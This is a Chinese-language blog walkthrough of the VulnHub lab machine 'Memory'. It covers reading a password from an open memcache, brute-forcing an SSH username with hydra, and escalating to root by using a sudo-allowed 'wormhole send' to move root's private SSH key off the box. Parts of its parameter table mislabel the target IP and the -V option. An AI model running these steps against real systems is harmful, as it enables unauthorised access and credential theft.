<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="1.nmap 快速全面扫描发现端口  1sudo nmap -n -Pn -sS -p- --min-rate 5000 192.168.3.25            参数 全称&#x2F;含义 作用   -n No DNS resolution 不进行 DNS 反向解析，直接显示 IP，提高扫描速度   -Pn Skip host discovery (Assume host is up)">
<meta property="og:type" content="article">
<meta property="og:title" content="Memory">
<meta property="og:url" content="https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/index.html">
<meta property="og:site_name" content="zhaochoudecat">
<meta property="og:description" content="1.nmap 快速全面扫描发现端口  1sudo nmap -n -Pn -sS -p- --min-rate 5000 192.168.3.25            参数 全称&#x2F;含义 作用   -n No DNS resolution 不进行 DNS 反向解析，直接显示 IP，提高扫描速度   -Pn Skip host discovery (Assume host is up)">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/1890547/1766912605570-c9e37f92-c366-4225-b0a5-38b1c34ea58d.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/1890547/1766913558711-e3551d0e-4e68-48d8-9b8b-85bb982054c3.png?x-oss-process=image/crop,x_0,y_0,w_2560,h_639">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/1890547/1766913748541-a7e0469c-a060-40c8-a297-acdc250c5442.png?x-oss-process=image/crop,x_0,y_556,w_2560,h_725">
<meta property="article:published_time" content="2026-05-01T16:00:00.000Z">
<meta property="article:modified_time" content="2026-05-02T16:56:09.097Z">
<meta property="article:author" content="zhaochoudecat">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2025/png/1890547/1766912605570-c9e37f92-c366-4225-b0a5-38b1c34ea58d.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Memory</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- rss -->
    
    
<meta name="generator" content="Hexo 8.1.1"></head>

<body>
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Game-of-Thrones_%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C/"><i class="fa fa-chevron-left" aria-hidden="true" onmouseover='$("#i-prev").toggle();' onmouseout='$("#i-prev").toggle();'></i></a></li>
        
        
        <li><a class="icon" href="/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/covfefe/"><i class="fa fa-chevron-right" aria-hidden="true" onmouseover='$("#i-next").toggle();' onmouseout='$("#i-next").toggle();'></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up" aria-hidden="true" onmouseover='$("#i-top").toggle();' onmouseout='$("#i-top").toggle();'></i></a></li>
        <li><a class="icon" href="#"><i class="fa fa-share-alt" aria-hidden="true" onmouseover='$("#i-share").toggle();' onmouseout='$("#i-share").toggle();' onclick='$("#share").toggle();return false;'></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/"><i class="fa fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&text=Memory"><i class="fa fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&title=Memory"><i class="fa fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&is_video=false&description=Memory"><i class="fa fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Memory&body=Check out this article: https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/"><i class="fa fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&title=Memory"><i class="fa fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&title=Memory"><i class="fa fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&title=Memory"><i class="fa fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&title=Memory"><i class="fa fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&name=Memory&description="><i class="fa fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-nmap"><span class="toc-number">1.</span> <span class="toc-text">1.nmap</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-11211-TCP-MEMCACHE"><span class="toc-number">2.</span> <span class="toc-text">2.11211&#x2F;TCP (MEMCACHE)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-22-TCP-SSH"><span class="toc-number">3.</span> <span class="toc-text">3.22&#x2F;TCP (SSH)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E7%88%86%E7%A0%B4%E7%94%A8%E6%88%B7%E5%90%8D-%EF%BC%88%E4%B9%9D%E5%A4%B4%E8%9B%87%EF%BC%89"><span class="toc-number">3.1.</span> <span class="toc-text">1. 爆破用户名 （九头蛇）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E7%99%BB%E5%BD%95"><span class="toc-number">3.2.</span> <span class="toc-text">2. 登录</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">4.</span> <span class="toc-text">4.权限提升</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#sudo"><span class="toc-number">4.1.</span> <span class="toc-text">sudo</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8"><span class="toc-number">4.2.</span> <span class="toc-text">使用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Flags"><span class="toc-number">5.</span> <span class="toc-text">Flags</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index width mx-auto px2 my4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Memory
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">zhaochoudecat</span>
      </span>
      
    <div class="postdate">
        <time datetime="2026-05-01T16:00:00.000Z" itemprop="datePublished">2026-05-02</time>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p><img src="https://cdn.nlark.com/yuque/0/2025/png/1890547/1766912605570-c9e37f92-c366-4225-b0a5-38b1c34ea58d.png"></p>
<h2 id="1-nmap"><a href="#1-nmap" class="headerlink" title="1.nmap"></a>1.nmap</h2><ul>
<li>快速全面扫描发现端口</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -n -Pn -sS -p- --min-rate 5000 192.168.3.25</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2025/png/1890547/1766913558711-e3551d0e-4e68-48d8-9b8b-85bb982054c3.png?x-oss-process=image/crop,x_0,y_0,w_2560,h_639"></p>
<table>
<thead>
<tr>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>参数</td>
<td>全称&#x2F;含义</td>
<td>作用</td>
</tr>
<tr>
<td><code>-n</code></td>
<td><strong>No DNS resolution</strong></td>
<td><strong>不进行 DNS 反向解析</strong>，直接显示 IP，提高扫描速度</td>
</tr>
<tr>
<td><code>-Pn</code></td>
<td><strong>Skip host discovery (Assume host is up)</strong></td>
<td><strong>跳过主机发现阶段</strong>，不发送 Ping，直接扫描端口。适用于防火墙屏蔽 ICMP 的主机</td>
</tr>
<tr>
<td><code>-sS</code></td>
<td><strong>TCP SYN Scan (Half-open scan)</strong></td>
<td><strong>最常用的扫描方式</strong>，发送 SYN 包，如果收到 SYN-ACK 则认为端口开放，然后立刻发送 RST 终止连接。相比完整 TCP 连接更隐蔽、更快</td>
</tr>
<tr>
<td><code>-p-</code></td>
<td><strong>Scan all ports (1-65535)</strong></td>
<td>扫描 <strong>全部 65535 个 TCP 端口</strong>，而不仅限于常见的 1000 个端口</td>
</tr>
<tr>
<td><code>--min-rate 5000</code></td>
<td><strong>Minimum packet send rate: 5000 packets&#x2F;sec</strong></td>
<td>控制 Nmap <strong>每秒至少发送 5000 个探测包</strong>，大幅 <strong>加快扫描速度</strong>，但可能会增加网络负载或被防火墙拦截的风险</td>
</tr>
<tr>
<td><code>192.168.3.25</code></td>
<td><strong>目标 IP 地址</strong></td>
<td>要扫描的主机 IP</td>
</tr>
</tbody></table>
<ul>
<li>探测目标主机 22、80、11211 端口的开放状态、对应服务版本信息，并执行默认脚本扫描以获取额外安全相关信息</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sVC -p 22,80,11211 192.168.3.25</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2025/png/1890547/1766913748541-a7e0469c-a060-40c8-a297-acdc250c5442.png?x-oss-process=image/crop,x_0,y_556,w_2560,h_725"></p>
<h2 id="2-11211-TCP-MEMCACHE"><a href="#2-11211-TCP-MEMCACHE" class="headerlink" title="2.11211&#x2F;TCP (MEMCACHE)"></a>2.11211&#x2F;TCP (MEMCACHE)</h2><p>这里可以参考网站测试</p>
<p><a target="_blank" rel="noopener" href="https://book.hacktricks.wiki/en/network-services-pentesting/11211-memcache/index.html#manual">11211 - Pentesting Memcache - HackTricks</a></p>
<ul>
<li>连接（或者nc）</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ telnet 192.168.3.25 11211</span><br><span class="line">Trying 192.168.3.25...</span><br><span class="line">Connected to 192.168.3.25.</span><br><span class="line">Escape character is &#x27;^]&#x27;.</span><br><span class="line">version</span><br><span class="line">VERSION 1.6.18</span><br></pre></td></tr></table></figure>

<p>Telnet 是基于 TCP 协议的远程登录 &#x2F; 端口测试工具，核心价值在于 <strong>快速验证端口连通性</strong> 和 <strong>手动交互测试服务</strong>（无需复杂工具），在渗透测试中常用于补充 Nmap 扫描结果、验证服务存活状态，</p>
<ul>
<li>列表 查找数据</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">stats items</span><br><span class="line">STAT items:1:number 1</span><br><span class="line">STAT items:1:number_hot 0</span><br><span class="line">STAT items:1:number_warm 0</span><br><span class="line">STAT items:1:number_cold 1</span><br><span class="line">STAT items:1:age_hot 0</span><br><span class="line">STAT items:1:age_warm 0</span><br><span class="line">STAT items:1:age 4065</span><br><span class="line">STAT items:1:mem_requested 82</span><br><span class="line">STAT items:1:evicted 0</span><br><span class="line">STAT items:1:evicted_nonzero 0</span><br><span class="line">STAT items:1:evicted_time 0</span><br><span class="line">STAT items:1:outofmemory 0</span><br><span class="line">STAT items:1:tailrepairs 0</span><br><span class="line">STAT items:1:reclaimed 0</span><br><span class="line">STAT items:1:expired_unfetched 0</span><br><span class="line">STAT items:1:evicted_unfetched 0</span><br><span class="line">STAT items:1:evicted_active 0</span><br><span class="line">STAT items:1:crawler_reclaimed 0</span><br><span class="line">STAT items:1:crawler_items_checked 11</span><br><span class="line">STAT items:1:lrutail_reflocked 0</span><br><span class="line">STAT items:1:moves_to_cold 1</span><br><span class="line">STAT items:1:moves_to_warm 0</span><br><span class="line">STAT items:1:moves_within_lru 0</span><br><span class="line">STAT items:1:direct_reclaims 0</span><br><span class="line">STAT items:1:hits_to_hot 0</span><br><span class="line">STAT items:1:hits_to_warm 0</span><br><span class="line">STAT items:1:hits_to_cold 0</span><br><span class="line">STAT items:1:hits_to_temp 0</span><br><span class="line">END</span><br></pre></td></tr></table></figure>

<ul>
<li>下载</li>
</ul>
<p>找到了密码** <code>NewPassword2025</code> **  但不知道用户名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">stats cachedump 1 0</span><br><span class="line">ITEM password [15 b; 0 s]</span><br><span class="line">END</span><br><span class="line">get password</span><br><span class="line">VALUE password 0 15</span><br><span class="line">NewPassword2025</span><br><span class="line">END</span><br></pre></td></tr></table></figure>

<h2 id="3-22-TCP-SSH"><a href="#3-22-TCP-SSH" class="headerlink" title="3.22&#x2F;TCP (SSH)"></a>3.22&#x2F;TCP (SSH)</h2><h3 id="1-爆破用户名-（九头蛇）"><a href="#1-爆破用户名-（九头蛇）" class="headerlink" title="1. 爆破用户名 （九头蛇）"></a>1. 爆破用户名 （九头蛇）</h3><p><a target="_blank" rel="noopener" href="https://github.com/danielmiessler/SecLists#">name.txt下载地址</a></p>
<p>爆破出了用户名 <strong><code>alan</code></strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">hydra -t 64 -L /opt/names.txt -p NewPassword2025 -f -V ssh://192.168.3.25</span><br><span class="line">[DATA] max 64 tasks per 1 server, overall 64 tasks, 10713 login tries (l:10713/p:1), ~168 tries per task</span><br><span class="line">[DATA] attacking ssh://192.168.3.25:22/</span><br><span class="line">[ATTEMPT] target 192.168.3.25 - login &quot;aaliyah&quot; - pass &quot;NewPassword2025&quot; - 1 of 10713 [child 0] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.25 - login &quot;aaren&quot; - pass &quot;NewPassword2025&quot; - 2 of 10713 [child 1] (0/0)</span><br><span class="line">#.......</span><br><span class="line">[22][ssh] host: 192.168.3.25   login: alan   password: NewPassword2025</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td><strong>参数</strong></td>
<td><strong>作用说明</strong></td>
</tr>
<tr>
<td><code>hydra</code></td>
<td>开源暴力破解工具核心命令，支持 SSH、FTP、HTTP 等多种服务的爆破测试</td>
</tr>
<tr>
<td><code>-t 64</code></td>
<td>设置并发线程数为 64，提升爆破速度；内网环境下 64 线程效率较高，外网建议降低至 10-20 线程（避免被 WAF &#x2F; 防火墙拦截或目标服务器拒绝服务）</td>
</tr>
<tr>
<td><code>-L /opt/names.txt</code></td>
<td>指定<strong>批量用户名列表文件</strong>（大写 L）：1. <code>-L</code><br><br>对应多用户名字典，与单用户名参数 <code>-l</code><br><br>（小写 l）区分；2. 字典路径为 <code>/opt/names.txt</code>，文件内每行一个用户名（如 root、admin、user 等）</td>
</tr>
<tr>
<td><code>-p NewPassword2025</code></td>
<td>指定<strong>单一固定密码</strong>（小写 p）：密码为 <code>NewPassword2025</code>，该参数用于已知疑似统一密码的场景，与多密码字典参数 <code>-P</code>(大写 P）区分</td>
</tr>
<tr>
<td><code>ssh://192.168.1.68</code></td>
<td>指定爆破目标：协议为 SSH，目标 IP 为 <code>192.168.1.68</code>（对应 22 端口，SSH 默认端口可省略，非默认端口需格式化为 <code>ssh://192.168.1.68:端口号</code>）</td>
</tr>
<tr>
<td><code>-f</code></td>
<td>找到第一个有效用户名 + 密码组合后立即停止爆破（节省时间，适合只需获取一个有效账号的景）</td>
</tr>
<tr>
<td><code>-V</code></td>
<td>Print version information</td>
</tr>
</tbody></table>
<h3 id="2-登录"><a href="#2-登录" class="headerlink" title="2. 登录"></a>2. 登录</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ sshpass -p &#x27;NewPassword2025&#x27; ssh alan@192.168.3.25 -o StrictHostKeyChecking=no</span><br><span class="line">Warning: Permanently added &#x27;192.168.3.25&#x27; (ED25519) to the list of known hosts.</span><br><span class="line">alan@memory:~$ id</span><br><span class="line">uid=1000(alan) gid=1000(alan) grupos=1000(alan)</span><br></pre></td></tr></table></figure>

<p>sshpass的核心作用是：让 ssh命令能够接受密码参数，实现非交互式登录。</p>
<h2 id="4-权限提升"><a href="#4-权限提升" class="headerlink" title="4.权限提升"></a>4.权限提升</h2><h3 id="sudo"><a href="#sudo" class="headerlink" title="sudo"></a>sudo</h3><p>用户**<code>alan</code>** 可以用**<code>sudo</code><strong>以</strong><code>root</code><strong>身份执行</strong><code>wormhole</code>**命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">alan@memory:~$ <span class="built_in">sudo</span> -l</span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> alan on memory:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty</span><br><span class="line"></span><br><span class="line">User alan may run the following commands on memory:</span><br><span class="line">    (root) NOPASSWD: /usr/bin/wormhole</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">alan@memory:~$ <span class="built_in">sudo</span> /usr/bin/wormhole --<span class="built_in">help</span></span><br><span class="line">Usage: wormhole [OPTIONS] COMMAND [ARGS]...</span><br><span class="line"></span><br><span class="line">  Create a Magic Wormhole and communicate through it.</span><br><span class="line"></span><br><span class="line">  Wormholes are created by speaking the same magic CODE <span class="keyword">in</span> two different</span><br><span class="line">  places at the same <span class="keyword">time</span>.  Wormholes are secure against anyone <span class="built_in">who</span> doesn<span class="string">&#x27;t</span></span><br><span class="line"><span class="string">  use the same code.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Options:</span></span><br><span class="line"><span class="string">  --appid APPID                   appid to use</span></span><br><span class="line"><span class="string">  --relay-url URL                 rendezvous relay to use</span></span><br><span class="line"><span class="string">  --transit-helper tcp:HOST:PORT  transit relay to use</span></span><br><span class="line"><span class="string">  --dump-timing FILE.json         (debug) write timing data to file</span></span><br><span class="line"><span class="string">  --version                       Show the version and exit.</span></span><br><span class="line"><span class="string">  --help                          Show this message and exit.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Commands:</span></span><br><span class="line"><span class="string">  help</span></span><br><span class="line"><span class="string">  receive  Receive a text message, file, or directory (from &#x27;</span>wormhole send<span class="string">&#x27;)</span></span><br><span class="line"><span class="string">  send     Send a text message, file, or directory</span></span><br><span class="line"><span class="string">  ssh      Facilitate sending/receiving SSH public keys</span></span><br></pre></td></tr></table></figure>

<p>ssh Facilitate sending&#x2F;receiving SSH public keys 便于发送 &#x2F; 接收 SSH 公钥</p>
<h3 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h3><p>可以发送**<code>root</code>** 的私钥**<code>id_rsa</code>**</p>
<ul>
<li>发送</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">alan@memory:~$ sudo  /usr/bin/wormhole send /root/.ssh/id_rsa</span><br><span class="line">Sending 2.6 kB file named &#x27;id_rsa&#x27;</span><br><span class="line">Wormhole code is: 5-eskimo-cleanup</span><br><span class="line">On the other computer, please run:</span><br><span class="line"></span><br><span class="line">wormhole receive 5-eskimo-cleanup</span><br><span class="line"></span><br><span class="line">Sending (&lt;-192.168.3.25:53750)..</span><br><span class="line"><span class="meta prompt_">100%</span><span class="language-bash">|████████████████████████████████████████████████████████████████████████████████████████████| 2.59k/2.59k [00:00&lt;00:00, 452kB/s]</span></span><br><span class="line">File sent.. waiting for confirmation</span><br><span class="line">Confirmation received. Transfer complete.</span><br></pre></td></tr></table></figure>

<ul>
<li>接收 （这里本地新开一个终端）</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ sshpass -p &#x27;NewPassword2025&#x27; ssh alan@192.168.3.25 -o StrictHostKeyChecking=no</span><br><span class="line">alan@memory:~$ wormhole receive 5-eskimo-cleanup</span><br><span class="line">Receiving file (2.6 kB) into: id_rsa</span><br><span class="line">ok? (Y/n): Y</span><br><span class="line">Receiving (-&gt;tcp:192.168.3.25:36589)..</span><br><span class="line"><span class="meta prompt_">100%</span><span class="language-bash">|███████████████████████████████████████████████████████████████████████████████████████████| 2.59k/2.59k [00:00&lt;00:00, 12.4kB/s]</span></span><br><span class="line">Received file written to id_rsa</span><br></pre></td></tr></table></figure>

<h2 id="Flags"><a href="#Flags" class="headerlink" title="Flags"></a>Flags</h2><p>可以使用<code>root</code>查找<code>**user.txt**</code>和<code>**root.txt**</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">alan@memory:~$ chmod 600 id_rsa </span><br><span class="line">alan@memory:~$ ssh -i id_rsa root@192.168.3.25</span><br><span class="line">root@memory:~# find / -name user.txt -o -name root.txt 2&gt;/dev/null | xargs cat </span><br><span class="line">db516ff5b787b724346d84f61fc5c702</span><br><span class="line">9d1e64f050e5b8ebf3b78fa84199b3cd</span><br><span class="line">root@memory:~# </span><br></pre></td></tr></table></figure>
  </div>
</article>



    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-nmap"><span class="toc-number">1.</span> <span class="toc-text">1.nmap</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-11211-TCP-MEMCACHE"><span class="toc-number">2.</span> <span class="toc-text">2.11211&#x2F;TCP (MEMCACHE)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-22-TCP-SSH"><span class="toc-number">3.</span> <span class="toc-text">3.22&#x2F;TCP (SSH)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E7%88%86%E7%A0%B4%E7%94%A8%E6%88%B7%E5%90%8D-%EF%BC%88%E4%B9%9D%E5%A4%B4%E8%9B%87%EF%BC%89"><span class="toc-number">3.1.</span> <span class="toc-text">1. 爆破用户名 （九头蛇）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E7%99%BB%E5%BD%95"><span class="toc-number">3.2.</span> <span class="toc-text">2. 登录</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">4.</span> <span class="toc-text">4.权限提升</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#sudo"><span class="toc-number">4.1.</span> <span class="toc-text">sudo</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8"><span class="toc-number">4.2.</span> <span class="toc-text">使用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Flags"><span class="toc-number">5.</span> <span class="toc-text">Flags</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/"><i class="fa fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&text=Memory"><i class="fa fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&title=Memory"><i class="fa fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&is_video=false&description=Memory"><i class="fa fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Memory&body=Check out this article: https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/"><i class="fa fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Memory/&title=Memory"><i class="fa fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
